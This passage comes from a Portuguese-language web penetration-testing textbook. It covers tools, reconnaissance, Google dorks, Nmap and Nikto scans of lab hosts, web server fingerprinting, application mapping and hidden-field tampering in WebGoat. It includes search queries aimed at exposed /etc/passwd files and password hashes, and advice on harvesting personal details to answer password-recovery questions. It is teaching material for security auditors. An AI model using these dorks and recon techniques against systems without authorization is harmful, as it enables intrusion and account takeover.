os protocolos TCP e UDP, em qualquer porta e com os parmetros que se queira. Alm disso,
pode ser usado independentemente ou em conjunto com outras ferramentas ou scripts e
facilmente compilvel, sem alteraes, para diversos sistemas operacionais, como Linux, BSD,
Unix e Mac OS X. Um ponto negativo, entretanto, a falta de suporte aos protocolos SSL e TLS,
mas que pode ser resolvido por meio da associao com outras ferramentas.
Como exemplo, considere-se o exerccio sobre mtodos HTTP do Captulo 1. Ele pode ser
executado com o Netcat da seguinte maneira:
nc exemplo.esr.rnp.br 80
OPTIONS / HTTP/1.0
OpenSSL
Utilitrio livre que permite trabalhar com diversos algoritmos criptogrficos e com os
protocolos SSL e TLS, suprindo assim a deficincia apresentada pelo Netcat. Est disponvel
para inmeras plataformas, como Linux, BSD, Mac OS X e Windows, e empregado por
diversos softwares, como o Apache mod_ssl, Sendmail e OpenCA. Pode ser usado via linha
de comando ou programaticamente, por meio de cdigos escritos em linguagens C e C++. Em
testes de invaso de aplicaes web, empregado para verificar a configurao de SSL/TLS
de servidores web e dos demais elementos do ambiente.
Nikto
Aplicativo livre, fornecido sob licena GPL, que serve para varrer servidores web em busca
de arquivos e diretrios instalados por padro, problemas especficos de verso e configura-
es vigentes. A base de dados inclui milhares de itens para inmeras plataformas e atua-
lizada constantemente com novas informaes. Uma informao importante que Nikto
uma ferramenta ruidosa, isto , procura executar a tarefa no menor tempo possvel, sem se
preocupar em ser detectada por sistemas de deteco de intruso.
Metasploit Framework
uma plataforma livre escrita em linguagem Ruby e cujos componentes so desenvolvidos
em C e Assembly. Usada em testes de invaso e criao de ferramentas de segurana,
possui uma base de dados de exploits para as mais diversas plataformas, que pode ser Exploit
estendida pelo prprio analista de segurana. Especificamente para avaliao de segurana Programa desenvolvido
para explorar uma ou
de aplicaes web, pode ser empregada na fase de mapeamento, na explorao de vulnera-
mais vulnerabilidades
bilidades nas plataformas subjacentes e na automatizao de diversas tarefas, por exemplo. de um sistema ou
ambiente e violar, assim,
Exerccio de fixao 2 e requisitos implcitos ou
explcitos de segurana
Tipos de ferramentas da informao.
Que tipos de ferramentas podem ser empregados em um teste de invaso?
50
Reconhecimento
A fase de reconhecimento tem por objetivo levantar o mximo possvel de informaes q
da aplicao alvo, principalmente nos casos de teste caixa-preta, em que quase nada
fornecido de antemo ao analista de segurana.
Embora esta etapa seja fundamental para um teste bem-sucedido, muitas vezes no
executada sistematicamente pelo auditor.
Para que o reconhecimento seja realizado com xito, importante se ter uma ideia do
tipo de informao que deve ser procurada.
1 Nomes de funcionrios.
1 Identificadores de usurios.
1 Informaes diversas sobre usurios.
1 Tecnologias empregadas.
1 Servidores e topologia de rede.
1 Configuraes dos componentes.
1 Recursos disponibilizados pelos servidores web.
1 Arquivos robots.txt.
A lista abaixo ilustra alguns exemplos e as respectivas finalidades em um teste de invaso:
1 Nomes de funcionrios utilizados para compor identificadores de usurios da apli-

cao, para testes de quebra de autenticao.
1 Identificadores de usurios podem ser usados nos testes de quebra de autenticao e

inferncia da regra empregada para formao de identificadores.
1 Informaes diversas sobre usurios informaes como msicas prediletas, time de

futebol, primeira escola e nomes dos pais, dentre muitas outras, podem favorecer a recu-
perao de senhas, quando perguntas secretas so utilizadas com esse propsito.
1 Tecnologias empregadas servem para direcionar a identificao e explorao de

vulnerabilidades, pois linguagens de programao e plataformas possuem caractersticas
particulares que devem ser consideradas em um teste. Por exemplo, se a aplicao
escrita em Java, ataques de extravasamento de buffer no costumam ser efetivos, e se
uma verso antiga de Oracle utilizada, h chances de que a conta System com senha
Manager esteja habilitada.
1 Servidores e topologia de rede por meio da deteco de portas e servios habilitados

nos servidores, possvel identificar tecnologias empregadas e eventuais canais secun-
drios de ataque, e, via a topologia de rede, mapear ativos que podem ser usados no
processo de invaso. O conhecimento dos sistemas operacionais utilizados, por sua vez,
permite direcionar ataques que envolvem a interao desta camada com a aplicao.
1 Configuraes dos componentes dependendo da maneira como os elementos que

compem a aplicao esto configurados, alguns ataques podem ou no ser possveis.
1 Recursos disponibilizados pelos servidores web pginas web, cdigo-fonte, cpias de

segurana e arquivos antigos, dentre outros, muitas vezes, esto diretamente acessveis
pelos servidores web. Tais elementos podem revelar detalhes de implementao, pro-
blemas existentes, senhas de acesso e interfaces escondidas, por exemplo.
51
1 Arquivos robots.txt indicam a web spiders partes de um stio web que no devem
ser copiadas, porm, cabe ao software decidir se honra ou no a solicitao. Como os
recursos listados nesses arquivos podem ser acessados, se desejado, eles revelam ele-
mentos da aplicao que devem ser mapeados e analisados.
Levantamento de informaes em fontes pblicas

Muitas informaes interessantes para o teste de invaso podem ser obtidas em fontes q
pblicas, sem grande esforo. Exemplos:
1 Redes sociais.
1 Grupos de discusso.
1 Anncios de emprego.
1 WHOIS.
1 DNS.
1 Redes sociais nomes de funcionrios, usurios e preferncias pessoais podem ser
encontradas em redes sociais, como Orkut, LinkedIn e Facebook. Vasculhando as comuni-
dades e descries de cada pessoa, tambm, possvel se ter uma noo das tecnologias
empregadas pela empresa e obter respostas para perguntas secretas usadas em meca-
nismos de recuperao de senhas.
1 Grupos de discusso comum pessoas postarem dvidas em grupos de discusso,

contendo informaes detalhadas do problema, como a dificuldade encontrada, os
arquivos de configurao e as verses dos softwares utilizados. A partir disso, pode-se
identificar algumas das tecnologias empregadas pelo alvo, configuraes dos ativos,
nome de funcionrio e identificador de usurio.
1 Anncios de empregos analisando as vagas de emprego de uma companhia, possvel

descobrir tecnologias utilizadas e eventuais reas carentes de profissionais, o que pode
implicar vulnerabilidades de configurao.
1 WHOIS protocolo utilizado para recuperar diversas informaes sobre um nome de

domnio ou endereo IP, como proprietrios, contatos dos responsveis e servidores
de nome. As informaes fornecidas revelam nomes de funcionrios, e-mails e temas
utilizados na atribuio de nomes de servidores, que podem ser refletidos na escolha de
senhas administrativas.
1 DNS no caso improvvel de uma transferncia de zona estar habilitada para qualquer um,
possvel obter toda a base de dados dos servidores DNS da empresa, contendo nomes de DNS
servidores e endereos IP. De outro modo, a partir dos registros de servidores de nome e Domain Name System
um sistema hierrquico
de e-mail, pode-se identificar os temas utilizados na atribuio de nomes para ativos.
e distribudo de
gerenciamento de
Google hacking nomes de domnio,
q
permitindo que estes

Tcnica que utiliza o mecanismo de busca do Google para encontrar vulnerabilidades de sejam traduzidos para
endereos IP e vice-
software e de configurao em sistemas acessveis pela internet.
versa, no caso de
Embora o termo remeta ferramenta especfica do Google, os conceitos so gerais e DNS reverso.
podem ser aplicados a outros servios similares.
O uso em avaliaes de segurana possvel, porque esses mecanismos armazenam quase

tudo que encontram pela frente em uma gigantesca base de dados, que disponibilizada
para consultas baseadas em palavras e frases. Desse modo, o auditor de segurana pode ter
acesso a itens especficos, sem a necessidade de contatar o servidor web original da aplicao.
52
A partir disso, fica fcil perceber o valor de Google hacking para um teste de invaso em apli-
caes web, na fase de reconhecimento, quando informaes preliminares sobre o alvo so
levantadas. Observe-se, entretanto, que a tcnica no aplicvel para sistemas acessveis
somente pela rede interna, uma vez que os recursos da aplicao no podem ser catalo-
gados pelo mecanismo de busca. Isto verdade se um clone ou uma adaptao do sistema
no for disponibilizado, separadamente, para usurios externos. Neste caso, a tendncia
que os servidores dos dois ambientes sejam configurados de maneira muito prxima, seno
igual, e, assim, vulnerabilidades em um lado provavelmente se refletem no outro.
Antes de apresentar algumas consultas interessantes para testes de invaso, fundamental

fixar conceitos importantes sobre como elas so interpretadas e executadas, como devem
ser refinadas e os operadores avanados existentes.
Regras bsicas
Os seguintes itens representam os conceitos bsicos necessrios para se realizar uma q
consulta ao mecanismo de busca do Google:
1 O comportamento padro do Google considerar todas as palavras fornecidas,

exceto as comuns, que podem ser ignoradas.
1 O smbolo * pode ser usado para substituir um ou mais termos desconhecidos

na consulta.
1 No h diferenciao entre letras maisculas e minsculas, exceto para o operador

OR, discutido abaixo.
1 Os termos fornecidos so procurados em qualquer lugar de uma pgina, incluindo

ttulo, corpo e URL.
1 Delimitar com aspas duplas um conjunto de palavras determina que estas sejam
agrupadas como uma frase, que deve aparecer exatamente igual nos resultados.
1 No so considerados mais que 32 termos na pesquisa e tudo que excede este limite
descartado pelo mecanismo.
1 A ordem das palavras afeta o resultado da busca.

1 O operador OR deve ser escrito em maisculas e seleciona as pginas que contm
pelo menos um dos termos. Lembre-se que, normalmente, todos os termos so con-
siderados, isto , o operador AND empregado por padro.
1 O operador -, quando precedido de um espao, indica que nenhuma pgina com o

termo imediatamente posposto deve fazer parte do resultado.
1 O operador + deve ser precedido de um espao e usado quando o termo posposto

relevante para a pesquisa, mas ignorado pelo Google, por ser uma palavra
comum ou caractere.
Alm disso, ele serve para desabilitar sinnimos, indicando que o termo no deve ser substi-
tudo por outro de mesmo significado. Por exemplo, uma pesquisa por prefeitura sp
(sem as aspas) tambm traz pginas que contm o termo So Paulo em vez de sp. Se sp
for precedido por +, por outro lado, pginas que contenham somente So Paulo e no
sp sero excludas do resultado. Circundar a palavra por aspas duplas apresenta exata-
mente o mesmo efeito.
53
Operadores avanados
Existem diversos operadores avanados que podem ser utilizados para refinar os resultados q
de uma busca e os seguintes itens devem ser observados no uso deles (Long et al, 2008):
1 A sintaxe bsica de um operador avanado operador:termo de busca, sem

nenhum espao entre os elementos.
1 O termo de busca pode ser uma nica palavra ou uma frase entre aspas duplas.
1 Uma pesquisa pode conter termos simples misturados com operadores avanados,
desde que as sintaxes sejam respeitadas.
1 Operadores que comeam com all, normalmente, no se do bem com outros ope-
radores e, portanto, devem ser empregados sozinhos.
1 Os operadores - e OR podem ser aplicados a operadores avanados.

Uma explicao para todos os operadores avanados vai muito alm do escopo do pre-
sente texto e, assim, somente alguns deles sero abordados.
1 site
1 intitle
1 allintitle
1 inurl
1 allinurl
1 filetype
1 link
1 author
1 site restringe a busca a pginas do domnio especificado e, assim, deve ser usado em
testes de invaso para limitar os resultados ao escopo do trabalho. Ex.: a pesquisa site:esr.
rnp.br enumera apenas as pginas do domnio da Escola Superior de Redes da RNP.
1 intitle por padro, os termos de busca so pesquisados em qualquer lugar das pginas
contidas na base de dados do Google. Para limitar a pesquisa ao ttulo delas, isto , ao
texto delimitado pelo marcador TITLE, este operador deve ser empregado. Ex.: a pes-
quisa intitle:index of retorna pginas que contm index of no ttulo, o que comum
quando a navegao de diretrios est habilitada no servidor web.
1 allintitle similar a intitle, determina que todos os termos pospostos devem estar
presentes no ttulo da pgina. Ex.: para encontrar pginas cujos ttulos contm index of
e imagens, a pesquisa allintitle:index of imagens pode ser utilizada.
1 inurl a palavra ou frase deve aparecer na URL do recurso. Ex.: a pesquisa inurl:admin
lista pginas que contm admin na URL e pode ser utilizada para encontrar eventuais
pginas administrativas da aplicao.
1 allinurl todos os termos pospostos devem fazer parte da URL. Ex.: allinurl:admin password.
1 filetype instrui o Google a listar somente arquivos de um determinado tipo. Ex.: para
encontrar arquivos de configurao, pode-se utilizar a busca filetype:conf.
1 link permite encontrar pginas que possuam links para o domnio especificado.
Ex.: link:rnp.br.
1 author vlido para o Google Groups, permite listar mensagens postadas pelo autor
especificado. Ex.: author:stallman lista mensagens cujos autores tm Stallman como
parte do nome.
54
Exemplos de consultas
Vejamos alguns exemplos de consultas para encontrar na internet tudo que se possa ima-
ginar, desde cmeras IP at arquivos de senhas de usurios. Considerando a utilidade da
tcnica, recomenda-se gastar algum tempo estudando as pesquisas existentes na base, as
quais podem ajudar a encontrar as informaes desejadas de uma aplicao.
site:<domnio> login OR logon
Lista pginas empregadas para autenticao de usurios.
site:<domnio> inurl:temp OR inurl:tmp OR inurl:backup OR inurl:bak
Tem por objetivo encontrar arquivos temporrios ou cpias de segurana presentes em

servidores web do domnio especificado.
site:<domnio> intitle:index.of people.lst
Localiza arquivos contendo identificadores de usurios e hashes de senhas.
site:<domnio> intitle:index of etc passwd
Procura arquivos /etc/passwd acessveis pela internet.
site:<domnio> This file was generated by Nessus
Encontra relatrios gerados pela ferramenta Nessus, que podem indicar vulnerabilidades
presentes no ambiente.
Os exemplos ilustrados nesta seo foram extrados do Google Hacking Database, de

Johnny Long.
Identificao de sistema operacional, servios e portas

Para cada ativo descoberto ou listado pelo cliente, deve-se identificar o nome e verso q
do sistema operacional, alm dos servios e portas habilitados.
Uma das maneiras de realizar esta tarefa escutar passivamente todo o trfego de
entrada e sada do elemento e, com base em detalhes especficos de plataforma, inferir
as informaes desejadas.
O lado positivo desta abordagem que, normalmente, no deixa rastros, uma vez que
nenhum pacote enviado ao alvo. Por outro lado, num teste caixa-preta, dificilmente o ana-
lista ser capaz de escutar o trfego da rede.
A outra estratgia ativa, isto , a identificao ocorre por meio de interao com o q
servidor ou elemento de rede.
Dependendo do tempo disponvel, pode-se diminuir a velocidade com que a verificao

executada, para no gerar tantos alertas nos sistemas de deteco de intruso. Um utilitrio
que pode ser empregado com esta finalidade o Nmap, conforme exemplo a seguir:
esruser@ubuntu:~$ nmap -A -T4 192.168.1.1
Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-06 16:40 BRST

Interesting ports on 192.168.1.1:
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
55
21/tcp open ftp Netgear broadband router or ZyXel VoIP adapter
ftpd 1.0
23/tcp open telnet Netgear broadband router or ZyXel VoIP adapter
telnetd
80/tcp open http Embedded Allegro RomPager webserver 4.07
UPnP/1.0 (ZyXEL ZyWALL 2)
|_ html-title: Protected Object
| http-auth: HTTP Service requires authentication
| Auth type: Basic, realm = 550B-4P2
|_ HTTP server may accept admin:admin combination for Basic
authentication
Service detection performed. Please report any incorrect results at

http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
No comando acima, a opo -A habilita a deteco de nome e verso de sistema opera-

cional, o mdulo NSE e o traceroute, enquanto a opo -T4 faz com que a varredura seja
executada mais rapidamente. Observe-se que foram encontrados os servios FTP, telnet e
HTTP abertos, que este ltimo emprega autenticao bsica HTTP e que foi detectado um
usurio admin com senha admin. Tal achado, nesta etapa, uma grande descoberta, pois
j permite acesso administrativo aplicao logo no incio do trabalho.
Observamos que o Nmap realizou a identificao do servidor web, graas opo -A.
Porm, isto faz com que o processo seja executado para todos os servios disponveis no
ativo, o que nem sempre desejvel. Isso pode ser resolvido pela opo -p, que restringe
as portas que sero analisadas.
Identificao do servidor web

Existem mtodos e utilitrios que podem ser utilizados especificamente para reconhecer q
servidores web, e sempre interessante conferir o resultado com mais de uma soluo.
A possibilidade mais simples solicitar um recurso inexistente para o servidor web e

observar a pgina de erro resultante. Caso uma pgina personalizada no tenha sido
configurada, a padronizada exibida, a qual contm informaes sobre o servidor utili-
zado, conforme ilustrado na Figura 2.6.
Uma alternativa que fornece resultados semelhantes procurar por contedo instalado por
padro pelos softwares. importante mencionar que esse mtodo no muito confivel,
pois extremamente fcil configurar essas pginas, em plataformas diferentes, com o
intuito de enganar eventuais atacantes.
56
Figura 2.6
Tela padro de erro
do Apache.
Um mtodo mais robusto de reconhecimento de servidores web envolve analisar o com- q

portamento deles em diversas situaes, pois este varia bastante de fornecedor para
fornecedor, servindo assim como um discriminante (Meucci et al., 2008).
Itens que podem ser observados incluem o valor do cabealho Server, a ordem dos cabea-
lhos em respostas e o tratamento de requisies mal formadas ou com protocolos e verses
inexistentes, dentre outros. O exemplo abaixo ilustra a disposio dos cabealhos em uma
resposta a uma requisio HEAD, feita para os servidores Apache, lighttpd, nginx e Tomcat.
Apache 2.2.17
HTTP/1.1 200 OK
0 Date: Wed, 05 Jan 2011 13:53:25 GMT
1 Server: Apache/2.2.17 (Fedora)
2 Last-Modified: Mon, 22 Nov 2010 01:40:24 GMT
3 ETag: 61c27-5056-4959a57036427
4 Accept-Ranges: bytes
5 Content-Length: 20566
6 Connection: close
7 Content-Type: text/html; charset=iso-8859-1
lighttpd 1.4.26
HTTP/1.0 200 OK
7 Content-Type: text/html
3 ETag: 852229764
2 Last-Modified: Mon, 22 Oct 2007 12:13:49 GMT
6 Connection: close
0 Date: Wed, 05 Jan 2011 13:56:56 GMT
1 Server: lighttpd/1.4.26
57
nginx 0.8.53
HTTP/1.1 200 OK
1 Server: nginx/0.8.53
0 Date: Wed, 05 Jan 2011 13:57:59 GMT
2 Last-Modified: Sun, 31 Oct 2010 21:12:28 GMT
6 Connection: close
Tomcat 6.0.26
HTTP/1.1 200 OK
1 Server: Apache-Coyote/1.1
3 ETag: W/7777-1291366189000
2 Last-Modified: Fri, 03 Dec 2010 08:49:49 GMT
0 Date: Wed, 05 Jan 2011 14:00:19 GMT
6 Connection: close
Obviamente, realizar testes dessa natureza manualmente completamente invivel e,

portanto, necessrio automatizar a tarefa com uma ferramenta como o httprint, da
net-square. Este utilitrio bem interessante e prtico, mas requer que o arquivo de assi-
Figura 2.7
naturas seja atualizado, para que novas verses de servidores web sejam corretamente Sada do httprint
identificadas. A Figura 2.7 ilustra o resultado de um teste, empregando a base padro contra em teste de servi-
um servidor Apache 2.2.17. dor Apache.
58
Levantamento dos mtodos suportados pelos servidores web
H mtodos interessantes, como PUT, que permitem copiar arquivos para o servidor. q
Isso pode ser muito til para carregar ferramentas em uma mquina da rede que esteja
servindo de piv para atacar outro ativo do ambiente.
Assim, vantajoso saber os mtodos suportados por um servidor web, e uma maneira
direta de conseguir isto por meio do mtodo OPTIONS, caso esteja habilitado.
esruser@ubuntu:~$ nc exemplo.esr.rnp.br 8080

OPTIONS / HTTP/1.0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
Content-Length: 0
Date: Wed, 05 Jan 2011 16:16:12 GMT
Connection: close
Se o mtodo OPTIONS no for suportado, a sada ser semelhante abaixo:
esruser@ubuntu:~$ nc exemplo.esr.rnp.br 8090

OPTIONS / HTTP/1.0
HTTP/1.1 405 Not Allowed

Server: nginx/0.8.53
Date: Wed, 05 Jan 2011 16:23:21 GMT
Content-Type: text/html
Content-Length: 173
Connection: close
Neste caso, uma soluo consiste em se criar um script para fazer requisies ao servidor
web, para todos os mtodos existentes, e observar aqueles que so aceitos. possvel,
tambm, empregar o Nikto e aproveitar-se de diversas outras verificaes de configurao
que ele faz contra o servidor.
Deteco de hosts virtuais

muito comum hospedar diversos stios web em um nico servidor, com o objetivo de q
melhor alocar os recursos disponveis, e, para isso, duas tcnicas podem ser utilizadas.
Na primeira delas, conhecida por hospedagem virtual baseada em IP, cada stio recebe
um endereo IP diferente, que remete para o mesmo servidor fsico. Na outra, chamada
de hospedagem virtual baseada em nomes, diversos nomes de domnio so resolvidos
para um mesmo endereo IP e cabe ao servidor web discernir qual host virtual deve
tratar a requisio recebida.
A soluo para a questo acima reside no cabealho Host, que deve indicar o nome de
domnio do destino. Se ele no estiver presente, a requisio encaminhada para o host
padro, que nem sempre o correto.
Portanto, sempre que ferramentas como Netcat e Telnet ou scripts personalizados forem
utilizados para acessar aplicaes em servidores compartilhados, no se deve esquecer de
inclui-lo, sob pena de no se alcanar os resultados desejados.
59
Um teste simples para detectar o uso de servidor compartilhado por nomes consiste em q
resolver o nome de domnio da aplicao e tentar o acesso por endereo IP, o que faz
com que a requisio seja tratada pelo host padro.
Se este no for o responsvel por atender a aplicao, a pgina inicial de outro stio web
exibida, o que implica que o servidor no dedicado. Em caso contrrio, o mtodo no
capaz de fornecer uma resposta conclusiva.
Outra maneira de testar o compartilhamento de servidor por meio de ferramentas q

web que mapeiam endereos IP para nomes de domnio, de maneira similar a um DNS
reverso (Meucci et al., 2008).
Para exemplificar, a Figura 2.8 ilustra a sada de uma consulta realizada para o IP
200.219.245.136 ao servio WebHosting Info, a qual indica claramente a adoo de hospe-
dagem virtual baseada em nomes.
Figura 2.8
Consulta realizada
ao servio
WebHosting Info.
Descoberta de arquivos e diretrios

Google hacking uma tcnica interessante que pode ser utilizada para encontrar q
arquivos e diretrios em servidores, sem alertar os mecanismos de monitorao do
ambiente, uma vez que toda informao pode ser recuperada diretamente da base do
Google ou outro mecanismo de busca.
Uma abordagem mais agressiva consiste no uso de ferramentas como o Nikto, que testam
a presena de diversos itens de configurao, de acordo com uma base pr-cadastrada.
O relatrio abaixo resultado de um teste efetuado pelo Nikto contra uma mquina execu-
tando a distribuio Damn Vulnerable Linux. Observe-se que diversos diretrios e poten-
ciais vulnerabilidades foram encontrados pelo utilitrio e que o tempo de varredura, nove
segundos, extremamente baixo.
60
esruser@ubuntu:~$ nikto -host dvl.esr.rnp.br
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP: 192.168.213.100
+ Target Hostname: dvl.esr.rnp.br
+ Target Port: 80
+ Start Time: 2011-01-08 11:07:20
---------------------------------------------------------------------------
+ Server: Apache/1.3.37 (Unix) PHP/4.4.4
+ No CGI Directories found (use -C all to force check all possible
dirs)
- Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP method (Allow Header): TRACE is typically only
used for debugging and should be disabled. This message does not
mean it is vulnerable to XST.
+ Apache/1.3.37 appears to be outdated (current is at least
Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ PHP/4.4.4 appears to be outdated (current is at least 5.2.8)
+ OSVDB-0: GET /./ : Appending /./ to a directory allows indexing
+ OSVDB-0: GET /%2e/ : Weblogic allows source code or directory
listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.
com/bid/2513.
+ OSVDB-877: TRACK / : TRACK option (TRACE alias) appears to allow
XSS or credential theft. See http://www.cgisecurity.com/whitehat-
mirror/WhitePaper_screen.pdf for details
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or
credential theft. See http://www.cgisecurity.com/whitehat-mirror/
WhitePaper_screen.pdf for details
+ OSVDB-119: GET /?PageServices : The remote server may allow
directory listings through Web Publisher by forcing the server
to show all files via open directory browsing. Web Publisher
should be disabled. http://cve.mitre.org/cgi-bin/cvename.
cgi?name=CVE-1999-0269.
+ OSVDB-119: GET /?wp-cs-dump : The remote server may allow
directory listings through Web Publisher by forcing the server
to show all files via open directory browsing. Web Publisher
should be disabled. http://cve.mitre.org/cgi-bin/cvename.
cgi?name=CVE-1999-0269.
+ OSVDB-3092: GET /info/ : This might be interesting...

+ OSVDB-3092: GET /phpmyadmin/ : phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: GET /manual/ : Web server manual found.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /
manual/images
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 16 item(s) reported on remote host
61
+ End Time: 2011-01-08 11:07:29 (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Test Options: -host dvl.esr.rnp.br

---------------------------------------------------------------------------
Fase de reconhecimento
Que informaes devem ser obtidas na fase de reconhecimento?
Mapeamento
Na fase de mapeamento, deve ser criado um mapa da aplicao, que reflita a estruturao q
dos arquivos componentes, as funcionalidades ofertadas, os pontos de entrada de infor-
mao e as tecnologias utilizadas. Tudo isso realizado por meio dos seguintes passos:
1 Cpia das pginas e recursos da aplicao.

1 Identificao dos pontos de entrada de informao.
1 Relacionamento com as informaes de reconhecimento.
Cpia das pginas e recursos da aplicao

Este primeiro passo consiste em realizar uma cpia integral das partes acessveis da q
aplicao, iniciando pela pgina inicial e incluindo quaisquer pginas que tenham sido
descobertas na fase de reconhecimento.
Esta tarefa, obviamente, no deve ser feita de maneira manual, gravando-se, por meio
do navegador, cada uma das pginas visitadas. Por outro lado, viu-se que uma estra-
tgia totalmente automatizada tambm no adequada, pois pode ocorrer de itens no
serem cobertos, ou pginas perigosas, acessadas. Assim, uma abordagem hbrida deve
ser empregada, na qual o auditor navega pela aplicao, enquanto que um web spider
grava as pginas e monta o mapa automaticamente.
Uma vantagem clara desse mtodo que as dificuldades encontradas por esse tipo de
software, como interpretao de Javascript, autenticao e processos de mltiplos estgios,
so superadas, porque estas tarefas ficam a cargo do analista.
A Figura 2.9 ilustra o mapa de uma aplicao, gerado pelo software Burp Suite por meio
desta abordagem. O lado esquerdo da interface mostra a estrutura da aplicao, indicando,
neste exemplo, diretrios, arquivos e funcionalidades definidas por parmetros passados a
scripts PHP. Na parte direita superior, um resumo da requisio e da resposta, relacionadas
ao elemento selecionado, apresentado e, na parte inferior, detalhes so fornecidos.
O arquivo accounts.txt, exibido na figura, contm usurios e senhas do sistema e foi desco-
berto automaticamente a partir do contedo do arquivo robots.txt.
62
q
Figura 2.9
Cpia de aplicao Neste processo, comum que recursos ainda no mapeados sejam revelados, por meio
com Burp Suite.
de links ou comentrios nas pginas capturadas. Esses elementos podem englobar, por
exemplo, funcionalidades desativadas ou futuras, pginas antigas, pginas privilegiadas
que no esto visveis para o perfil de acesso atual, servidores auxiliares e plataformas
de desenvolvimento e teste.
Todas as novas funcionalidades e pginas descobertas tambm devem ser copiadas e fazer
parte do mapa da aplicao. No caso dos novos servidores, deve-se voltar atividade de reco-
nhecimento, se fizerem parte do escopo contratado. Seno, importante discutir com o cliente
a necessidade de inclui-los no teste, considerando que no sejam de uma empresa externa.
Recursos escondidos, muitas vezes, podem ser encontrados a partir dos elementos q
j mapeados. Para isso, inicialmente, necessrio analisar o resultado obtido at o
momento e observar os nomes de arquivos, diretrios e parmetros.
Para cada arquivo da lista, deve-se efetuar requisies, variando-se a extenso para outras,
como .bak, .old, .tmp e .inc. Em seguida, caso um padro de nomes tenha sido identificado,
itens cujos nomes o satisfaam devem ter a existncia verificada (Stuttard e Pinto, 2007).
Por exemplo, se o mapa contiver arquivos AddUser.asp e ViewUser.asp, existe uma chance
que RemoveUser.asp, UpdateUser.asp e DisableUser.asp tambm sejam vlidos.
Identificao dos pontos de entrada de informao

Muitas vulnerabilidades ocorrem justamente porque este preceito no observado e q
informaes fornecidas pelos usurios so utilizadas, sem antes serem devidamente
validadas. Por esse motivo, torna-se evidente a importncia de se mapear os pontos de
entrada de informao, pois por meio da explorao deles que muitos problemas na
aplicao alvo sero descobertos.
63
Conforme Meucci et al (2008) e Sttutard e Pinto (2007), os seguintes elementos devem q
ser levantados:
1 Parmetros passados no corpo de requisies POST, principalmente, campos escon-

didos, que no so visveis pela interface da aplicao.
1 Parmetros passados via URL em requisies GET. Considere-se que nem sempre os
delimitadores-padro so utilizados.
1 Cookies e os lugares em que so definidos e modificados.

1 Cabealhos que tendem a ser processados pela aplicao, como User-Agent,
Referer e Host.
1 Cabealhos no padronizados utilizados em requisies GET e POST.

1 Canais secundrios que podem ser controlados pelo usurio. Por exemplo, um
servidor de arquivos de rede que permite submeter arquivos pelo protocolo FTP e
visualiz-los em uma interface web.
Uma regra de ouro para o desenvolvimento de softwares seguros que todo usurio deve
ser considerado malicioso e, portanto, nunca se deve confiar em nada que ele fornece.
Relacionamento com as informaes de reconhecimento

Neste ponto, algumas das informaes levantadas na fase de reconhecimento j devem q
ter sido utilizadas no processo de cpia dos arquivos da aplicao. Falta ainda, porm,
relacionar todas as funcionalidades mapeadas aos servidores e tecnologias identificados.
Isto importante por uma srie de razes:
1 H vulnerabilidades que afetam apenas linguagens e plataformas especficas.

1 Ataques que envolvem interao com o sistema operacional devem utilizar os comandos
especficos da plataforma.
1 Sistemas gerenciadores de bancos de dados relacionais possuem peculiaridades na

sintaxe de comandos SQL, que devem ser respeitadas na construo de ataques.
1 Relaes de confiana entre servidores e o posicionamento na topologia de rede per-

mitem identificar elementos estratgicos que devero ser explorados para o controle
completo do ambiente.
1 Problemas de configurao nas plataformas subjacentes podem invalidar mecanismos de

segurana implementados na aplicao ou facilitar a execuo de ataques.
Validao unilateral
comum encontrar aplicaes que validam entradas somente no lado cliente?
64
Descoberta de vulnerabilidades e explorao
Aps realizar todo o levantamento e mapeamento da aplicao, prossegue-se etapa q
de descoberta de vulnerabilidades, para posterior explorao. Com um pouco de sorte,
algumas fraquezas, como utilizao de usurios e senhas-padro, so encontradas logo
nas fases iniciais do teste de invaso. Para a maioria dos casos, porm, testes espec-
ficos para cada tipo de problema possvel devem ser executados, sempre guiados pelas
informaes coletadas.
No restante deste livro, os mtodos empregados para deteco e explorao de vulnerabili-

dades sero apresentados, iniciando-se pelo abuso de controles no lado cliente do sistema.
Explorao de controles no lado cliente

Um fato importante que muitas vezes esquecido ou ignorado por desenvolvedores q
de aplicaes web que, de modo geral, controles que so executados no lado cliente
podem ser violados com as ferramentas e conhecimentos apropriados.
Em alguns casos, o esforo necessrio para comprometer o controle mnimo; em outros,

uma base slida de engenharia reversa necessria, mas a tarefa ainda possvel. Desse
modo, esses mecanismos podem ser utilizados para auxiliar na interao do usurio com a
aplicao, evitando trfego de dados invlidos pela rede, em caso de erros, mas no como o
nico ponto para validao de entradas.
O caso clssico deste problema, que afetou diversas lojas virtuais, nos princpios do q
comrcio eletrnico, o armazenamento de preos em campos escondidos, para uso no
clculo da fatura a ser paga pelo cliente.
As motivaes por trs desta abordagem so facilitar o desenvolvimento da aplicao, dimi-

nuindo a interao com o banco de dados, e prover segurana por obscuridade, baseada no
falso pensamento de que o campo escondido no ser modificado, porque ele no visvel
aos usurios.
O mtodo mais simples de violar o uso de campos escondidos consiste em gravar o for- q
mulrio localmente, editar o valor do campo, recarregar o formulrio em um navegador
e submet-lo ao servidor (Stuttard e Pinto, 2007).
Uma abordagem mais elegante e prtica, contudo, utilizar um proxy de interceptao, para
alterar as informaes desejadas, em tempo de execuo, antes que a requisio deixe a
mquina do usurio. Esta tcnica bem verstil e tambm pode ser empregada para quebrar
restries impostas a campos de formulrios e validao baseada em cdigo Javascript.
O prximo exemplo, baseado no WebScarab e WegGoat, ilustra mais detalhadamente como

este tipo de vulnerabilidade pode ser explorado. A Figura 2.10 mostra o exerccio sobre explo-
rao de campos escondidos do WegGoat, que simula uma aplicao de comrcio eletrnico.
65
Figura 2.10
WebGoat: exerccio
sobre explorao de
campo escondido.
